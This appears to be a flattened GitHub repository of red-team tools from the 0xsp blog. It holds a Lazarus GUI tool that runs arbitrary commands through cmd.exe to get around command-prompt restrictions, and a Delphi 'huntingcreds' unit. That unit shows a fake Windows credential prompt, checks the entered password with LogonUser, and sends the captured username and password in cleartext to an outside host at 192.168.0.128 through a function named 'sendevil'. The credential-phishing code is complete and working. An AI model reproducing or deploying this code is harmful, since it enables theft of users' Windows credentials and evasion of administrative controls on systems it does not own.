├── README.md ├── T1121 ├── README.MD └── regasm.dll ├── cmd-bypass-tool ├── project1.lpi ├── project1.lpr ├── project1.res ├── readme.md ├── unit1.lfm └── unit1.pas ├── huntingcreds └── code.pas ├── imgs ├── DNS-Cat.png └── README └── red team ops- mind map.pdf /README.md: -------------------------------------------------------------------------------- 1 | # 0xsp 2 | 3 | all tools discussed on 0xsp.com will be shared in this main repo 4 | -------------------------------------------------------------------------------- /T1121/README.MD: -------------------------------------------------------------------------------- 1 | . 2 | -------------------------------------------------------------------------------- /T1121/regasm.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/T1121/regasm.dll -------------------------------------------------------------------------------- /cmd-bypass-tool/project1.lpi: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | <Scaled Value="True"/> 11 | <ResourceType Value="res"/> 12 | <UseXPManifest Value="True"/> 13 | <XPManifest> 14 | <DpiAware Value="True"/> 15 | </XPManifest> 16 | </General> 17 | <BuildModes Count="3"> 18 | <Item1 Name="Default" Default="True"/> 19 | <Item2 Name="Debug"> 20 | <CompilerOptions> 21 | <Version Value="11"/> 22 | <PathDelim Value="\"/> 23 | <Target> 24 | <Filename Value="project1"/> 25 | </Target> 26 | <SearchPaths> 27 | <IncludeFiles Value="$(ProjOutDir)"/> 28 | <UnitOutputDirectory Value="lib\$(TargetCPU)-$(TargetOS)"/> 29 | </SearchPaths> 30 | <Parsing> 31 | <SyntaxOptions> 32 | <IncludeAssertionCode Value="True"/> 33 | </SyntaxOptions> 34 | </Parsing> 35 | <CodeGeneration> 36 | <Checks> 37 | <IOChecks Value="True"/> 38 | <RangeChecks Value="True"/> 39 | <OverflowChecks Value="True"/> 40 | <StackChecks Value="True"/> 41 | </Checks> 42 | <VerifyObjMethodCallValidity Value="True"/> 43 | </CodeGeneration> 44 | <Linking> 45 | <Debugging> 46 | <DebugInfoType Value="dsDwarf2Set"/> 47 | <UseHeaptrc Value="True"/> 48 | <TrashVariables Value="True"/> 49 | <UseExternalDbgSyms Value="True"/> 50 | </Debugging> 51 | <Options> 52 | <Win32> 53 | <GraphicApplication Value="True"/> 54 | </Win32> 55 | </Options> 56 | </Linking> 57 | </CompilerOptions> 58 | </Item2> 59 | <Item3 Name="Release"> 60 | <CompilerOptions> 61 | <Version Value="11"/> 62 | <PathDelim Value="\"/> 63 | <Target> 64 | <Filename Value="project1"/> 65 | </Target> 66 | <SearchPaths> 67 | <IncludeFiles Value="$(ProjOutDir)"/> 68 | <UnitOutputDirectory Value="lib\$(TargetCPU)-$(TargetOS)"/> 69 | </SearchPaths> 70 | <CodeGeneration> 71 | <SmartLinkUnit Value="True"/> 72 | <Optimizations> 73 | <OptimizationLevel Value="3"/> 74 | </Optimizations> 75 | </CodeGeneration> 76 | <Linking> 77 | <Debugging> 78 | <GenerateDebugInfo Value="False"/> 79 | </Debugging> 80 | <LinkSmart Value="True"/> 81 | <Options> 82 | <Win32> 83 | <GraphicApplication Value="True"/> 84 | </Win32> 85 | </Options> 86 | </Linking> 87 | </CompilerOptions> 88 | </Item3> 89 | </BuildModes> 90 | <PublishOptions> 91 | <Version Value="2"/> 92 | <UseFileFilters Value="True"/> 93 | </PublishOptions> 94 | <RunParams> 95 | <FormatVersion Value="2"/> 96 | <Modes Count="0"/> 97 | </RunParams> 98 | <RequiredPackages Count="2"> 99 | <Item1> 100 | <PackageName Value="FCL"/> 101 | </Item1> 102 | <Item2> 103 | <PackageName Value="LCL"/> 104 | </Item2> 105 | </RequiredPackages> 106 | <Units Count="2"> 107 | <Unit0> 108 | <Filename Value="project1.lpr"/> 109 | <IsPartOfProject Value="True"/> 110 | </Unit0> 111 | <Unit1> 112 | <Filename Value="unit1.pas"/> 113 | <IsPartOfProject Value="True"/> 114 | <ComponentName Value="Form1"/> 115 | <HasResources Value="True"/> 116 | <ResourceBaseClass Value="Form"/> 117 | <UnitName Value="Unit1"/> 118 | </Unit1> 119 | </Units> 120 | </ProjectOptions> 121 | <CompilerOptions> 122 | <Version Value="11"/> 123 | <PathDelim Value="\"/> 124 | <Target> 125 | <Filename Value="project1"/> 126 | </Target> 127 | <SearchPaths> 128 | <IncludeFiles Value="$(ProjOutDir)"/> 129 | <UnitOutputDirectory Value="lib\$(TargetCPU)-$(TargetOS)"/> 130 | </SearchPaths> 131 | <Linking> 132 | <Options> 133 | <Win32> 134 | <GraphicApplication Value="True"/> 135 | </Win32> 136 | </Options> 137 | </Linking> 138 | </CompilerOptions> 139 | <Debugging> 140 | <Exceptions Count="3"> 141 | <Item1> 142 | <Name Value="EAbort"/> 143 | </Item1> 144 | <Item2> 145 | <Name Value="ECodetoolError"/> 146 | </Item2> 147 | <Item3> 148 | <Name Value="EFOpenError"/> 149 | </Item3> 150 | </Exceptions> 151 | </Debugging> 152 | </CONFIG> 153 | -------------------------------------------------------------------------------- /cmd-bypass-tool/project1.lpr: -------------------------------------------------------------------------------- 1 | program project1; 2 | 3 | {$mode objfpc}{$H+} 4 | 5 | uses 6 | {$IFDEF UNIX}{$IFDEF UseCThreads} 7 | cthreads, 8 | {$ENDIF}{$ENDIF} 9 | Interfaces, // this includes the LCL widgetset 10 | Forms, Unit1 11 | { you can add units after this }; 12 | 13 | {$R *.res} 14 | 15 | begin 16 | RequireDerivedFormResource:=True; 17 | Application.Scaled:=True; 18 | Application.Initialize; 19 | Application.CreateForm(TForm1, Form1); 20 | Application.Run; 21 | end. 22 | 23 | -------------------------------------------------------------------------------- /cmd-bypass-tool/project1.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/cmd-bypass-tool/project1.res -------------------------------------------------------------------------------- /cmd-bypass-tool/readme.md: -------------------------------------------------------------------------------- 1 | . 2 | -------------------------------------------------------------------------------- /cmd-bypass-tool/unit1.lfm: -------------------------------------------------------------------------------- 1 | object Form1: TForm1 2 | Left = 321 3 | Height = 419 4 | Top = 266 5 | Width = 633 6 | BorderStyle = bsSingle 7 | Caption = 'Bypass CMD restrication' 8 | ClientHeight = 419 9 | ClientWidth = 633 10 | DesignTimePPI = 120 11 | OnCreate = FormCreate 12 | LCLVersion = '2.0.6.0' 13 | object Button1: TButton 14 | Left = 464 15 | Height = 31 16 | Top = 342 17 | Width = 94 18 | Caption = 'send ' 19 | OnClick = Button1Click 20 | TabOrder = 0 21 | end 22 | object Edit1: TEdit 23 | Left = 16 24 | Height = 28 25 | Top = 343 26 | Width = 432 27 | TabOrder = 1 28 | end 29 | object Memo1: TMemo 30 | Left = 8 31 | Height = 312 32 | Top = 16 33 | Width = 608 34 | Lines.Strings = ( 35 | 'command prompt output' 36 | ) 37 | ScrollBars = ssAutoBoth 38 | TabOrder = 2 39 | end 40 | object Label1: TLabel 41 | Left = 16 42 | Height = 20 43 | Top = 383 44 | Width = 110 45 | Caption = 'https://0xsp.com' 46 | ParentColor = False 47 | end 48 | end 49 | -------------------------------------------------------------------------------- /cmd-bypass-tool/unit1.pas: -------------------------------------------------------------------------------- 1 | unit Unit1; 2 | 3 | {$mode objfpc}{$H+} 4 | 5 | interface 6 | 7 | uses 8 | Classes,windows, SysUtils, process, Forms, Controls, Graphics, Dialogs, StdCtrls; 9 | 10 | 11 | const 12 | buf_size = 2024; 13 | type 14 | 15 | { TForm1 } 16 | 17 | TForm1 = class(TForm) 18 | Button1: TButton; 19 | Edit1: TEdit; 20 | Label1: TLabel; 21 | Memo1: TMemo; 22 | procedure Button1Click(Sender: TObject); 23 | procedure FormCreate(Sender: TObject); 24 | private 25 | 26 | public 27 | 28 | end; 29 | 30 | var 31 | Form1: TForm1; 32 | 33 | implementation 34 | 35 | {$R *.lfm} 36 | 37 | { TForm1 } 38 | function SystemFolder: string; 39 | begin 40 | SetLength(Result, Windows.MAX_PATH); 41 | SetLength( 42 | Result, Windows.GetSystemDirectory(PChar(Result), Windows.MAX_PATH) 43 | ); 44 | end; 45 | function runit(cmd:string;arg:string):string; 46 | var 47 | process : Tprocess; 48 | output: string; 49 | list : Tstringlist; 50 | OutputStream : TStream; 51 | BytesRead : longint; 52 | Buffer : array[1..BUF_SIZE] of byte; 53 | 54 | begin 55 | 56 | process := Tprocess.Create(nil); 57 | OutputStream := TMemoryStream.Create; // we are going to store outputs as memory stream . 58 | process.Executable:=systemfolder+'\cmd.exe'; 59 | process.CommandLine:=cmd; // we can add value of arg into params to control plugin output 60 | try 61 | process.Options:= [poUsePipes]; 62 | process.Execute; 63 | repeat 64 | // Get the new data from the process to a maximum of the buffer size that was allocated. 65 | // Note that all read(...) calls will block except for the last one, which returns 0 (zero). 66 | BytesRead := Process.Output.Read(Buffer, BUF_SIZE); 67 | OutputStream.Write(Buffer, BytesRead) 68 | until BytesRead = 0; //stop if no more data is being recieved 69 | 70 | outputstream.Position:=0; 71 | form1.Memo1.Lines.LoadFromStream(outputstream); // add output into Memo component 72 | 73 | 74 | finally 75 | process.Free; 76 | end; 77 | end; 78 | procedure TForm1.Button1Click(Sender: TObject); 79 | var 80 | cmd_s:string; 81 | begin 82 | cmd_s := 'cmd.exe /c '; 83 | runit(cmd_s+edit1.Text,''); 84 | end; 85 | 86 | procedure TForm1.FormCreate(Sender: TObject); 87 | begin 88 | 89 | end; 90 | 91 | end. 92 | 93 | -------------------------------------------------------------------------------- /huntingcreds/code.pas: -------------------------------------------------------------------------------- 1 | unit code; 2 | 3 | 4 | 5 | interface 6 | 7 | uses 8 | Winapi.Windows, Winapi.Messages, System.SysUtils, System.Variants, System.Classes, Vcl.Graphics, 9 | Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.StdCtrls,wininet; 10 | 11 | type 12 | TForm1 = class(TForm) 13 | Button1: TButton; 14 | Button2: TButton; 15 | procedure Button1Click(Sender: TObject); 16 | private 17 | { Private declarations } 18 | public 19 | { Public declarations } 20 | end; 21 | 22 | var 23 | Form1: TForm1; 24 | 25 | implementation 26 | 27 | {$R *.dfm} 28 | 29 | function sendevil(const Url: string): string; 30 | var 31 | NetHandle: HINTERNET; 32 | UrlHandle: HINTERNET; 33 | Buffer: array[0..1023] of Byte; 34 | BytesRead: dWord; 35 | StrBuffer: UTF8String; 36 | begin 37 | Result := ''; 38 | BytesRead := Default(dWord); 39 | NetHandle := InternetOpen('Mozilla/5.0(compatible; WinInet)', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0); 40 | 41 | // NetHandle valid? 42 | if Assigned(NetHandle) then 43 | Try 44 | UrlHandle := InternetOpenUrl(NetHandle, PChar(Url), nil, 0, INTERNET_FLAG_RELOAD, 0); 45 | 46 | // UrlHandle valid? 47 | if Assigned(UrlHandle) then 48 | Try 49 | repeat 50 | InternetReadFile(UrlHandle, @Buffer, SizeOf(Buffer), BytesRead); 51 | SetString(StrBuffer, PAnsiChar(@Buffer[0]), BytesRead); 52 | Result := Result + StrBuffer; 53 | until BytesRead = 0; 54 | Finally 55 | InternetCloseHandle(UrlHandle); 56 | end 57 | // o/w UrlHandle invalid 58 | else 59 | writeln('Cannot open URL: ' + Url); 60 | Finally 61 | InternetCloseHandle(NetHandle); 62 | end 63 | // NetHandle invalid 64 | else 65 | raise Exception.Create('Unable to initialize WinInet'); 66 | end; 67 | 68 | 69 | 70 | 71 | function CredHunt(const Acaption,ADescription :string; 72 | AAuthError: Cardinal; var Auser,Apassword,Adomain:string; 73 | var ASavePassword: Boolean):Boolean; 74 | type 75 | 76 | PCredUIInfo = ^TCredUIInfo; 77 | TCredUIInfo = record 78 | cbSize : DWORD; 79 | hwndParent : HWND; 80 | pszMessageText : PChar; 81 | pszCaptionText : Pchar; 82 | hbmBanner : HBITMAP; 83 | 84 | end; 85 | 86 | const 87 | 88 | CRED_MAX_USERNAME_LENGTH = 256; 89 | CREDUI_MAX_PASSWORD_LENGTH = 256; 90 | CRED_MAX_DOMAIN_TARGET_NAME_LENGTH = 256; 91 | 92 | cred = 'credui.dll'; 93 | 94 | CredUIPromptForWindowsCredentialsName = {$IFDEF UNICODE} 95 | 'CredUIPromptForWindowsCredentialsW' 96 | {$ELSE} 97 | 'CredUIPromptForWindowsCredentialsA' 98 | {$ENDIF}; 99 | CredUnPackAuthenticationBufferName = {$IFDEF UNICODE} 100 | 'CredUnPackAuthenticationBufferW' 101 | {$ELSE} 102 | 'CredUnPackAuthenticationBufferA' 103 | {$ENDIF}; 104 | CREDUIWIN_GENERIC = $00000001; 105 | CREDUIWIN_CHECKBOX = $00000002; 106 | CREDUIWIN_AUTHPACKAGE_ONLY = $00000010; 107 | CREDUIWIN_IN_CRED_ONLY = $00000020; 108 | CREDUIWIN_ENUMERATE_ADMINS = $00000100; 109 | CREDUIWIN_ENUMERATE_CURRENT_USER = $00000200; 110 | CREDUIWIN_SECURE_PROMPT = $00001000; 111 | CREDUIWIN_PACK_32_WOW = $10000000; 112 | 113 | var 114 | lib : HMODULE; 115 | CredUIPromptForWindowsCredentials: function ( 116 | var pUiInfo : TCredUIInfo;dwAuthError:DWORD; var pulAuthPackage:ULONG;pvInAuthBuffer:PCardinal;ulInAuthBufferSize:ULONG; 117 | out ppvOutAuthBuffer: Cardinal; out pulOutAuthBufferSize: ULONG; 118 | pfsave: PVOID; dwFlags:DWORD): DWORD; stdcall; 119 | 120 | CredUnPackAuthenticationBuffer: function (dwFlags:DWORD;pAuthBuffer:PVOID;cbAuthBuffer:DWORD;pszUserName:LPSTR; 121 | var pcchlMaxUserName:DWORD; pszDomainName:LPSTR; var pcchMaxDomainName:DWORD;pszPassword:LPSTR; var pcchMaxPassword:DWORD 122 | ): LONGBOOL; stdcall; 123 | 124 | CredInfo : TCredUIInfo; 125 | lAuthPackage : ULONG; 126 | lMaxUsername,lMaxDomainName,lMaxPassword:Dword; 127 | user,password :string; 128 | lUsername,lPassword,lDomain : array [Byte] of Char; 129 | loutbuffer : Cardinal; 130 | loutbuffersize : DWord; 131 | 132 | 133 | begin 134 | lib := safeloadlibrary(cred); 135 | if Lib <> 0 then 136 | 137 | try 138 | CredUIPromptForWindowsCredentials := GetProcAddress(lib,CredUIPromptForWindowsCredentialsName); 139 | CredUnPackAuthenticationBuffer := GetProcAddress(lib,CredUnPackAuthenticationBufferName); 140 | 141 | if assigned(CredUIPromptForWindowsCredentials) and assigned(CredUnPackAuthenticationBuffer) then 142 | begin 143 | Fillchar(CredInfo, sizeof(CredInfo),0); 144 | CredInfo.cbsize := sizeof(Credinfo); 145 | 146 | if screen.FocusedForm <> nil then 147 | credinfo.hwndParent := screen.FocusedForm.Handle 148 | else 149 | if screen.Activeform <> nil then 150 | credinfo.hwndParent := screen.activeform.Handle 151 | else 152 | Credinfo.hwndParent := 0; 153 | 154 | Credinfo.pszCaptionText := Pchar(ACaption); 155 | Credinfo.pszMessageText := Pchar(ADescription); 156 | 157 | lAuthPackage := 0; 158 | 159 | 160 | case CredUIPromptForWindowsCredentials( 161 | CredInfo,AAuthError,lAuthPackage,nil,0,lOutBuffer,lOutBufferSize,@ASavePassword,CREDUIWIN_GENERIC or CREDUIWIN_CHECKBOX) of 162 | 163 | NO_ERROR: begin 164 | Zeromemory(@lusername,sizeof(lusername)); 165 | Zeromemory(@lPassword,sizeof(lpassword)); 166 | zeromemory(@lDomain,sizeof(lDomain)); 167 | Result := CredUnPackAuthenticationBuffer(0,pointer(loutbuffer),loutbuffersize, 168 | @lusername,lMaxUsername, 169 | @lDomain,lMaxDomainname, 170 | @lpassword,lMaxPassword); 171 | if result then 172 | begin 173 | Auser := string(lusername); 174 | Apassword := string(lpassword); 175 | ADomain := string(lDomain); 176 | result := true; 177 | end; 178 | 179 | end; 180 | ERROR_CANCELLED: 181 | result := false; 182 | else 183 | raise exception.Create('failed'); 184 | end; 185 | end else 186 | RaiseLastOSError; 187 | finally 188 | FreeLibrary(lib); 189 | end; 190 | 191 | 192 | 193 | end; 194 | 195 | 196 | procedure TForm1.Button1Click(Sender: TObject); 197 | var 198 | username,password,domain:string; 199 | savepassword:boolean; 200 | TOKEN : Thandle; 201 | begin 202 | 203 | if not CredHunt('test','test',$0,username,password,domain,savePassword) 204 | then 205 | exit; 206 | if not Logonuser(@username[1],nil,@password[1],LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,TOKEN) then 207 | 208 | sendevil('http://192.168.0.128/failed '+username+'pass='+password) 209 | else 210 | sendevil('http://192.168.0.128/success '+username+'pass=' +password); 211 | end; 212 | 213 | 214 | end. 215 | -------------------------------------------------------------------------------- /imgs/DNS-Cat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/imgs/DNS-Cat.png -------------------------------------------------------------------------------- /imgs/README: -------------------------------------------------------------------------------- 1 | . 2 | -------------------------------------------------------------------------------- /red team ops- mind map.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zux0x3a/0xsp/fc385510b2c138da716c0b49e0387e172c4ffa1a/red team ops- mind map.pdf --------------------------------------------------------------------------------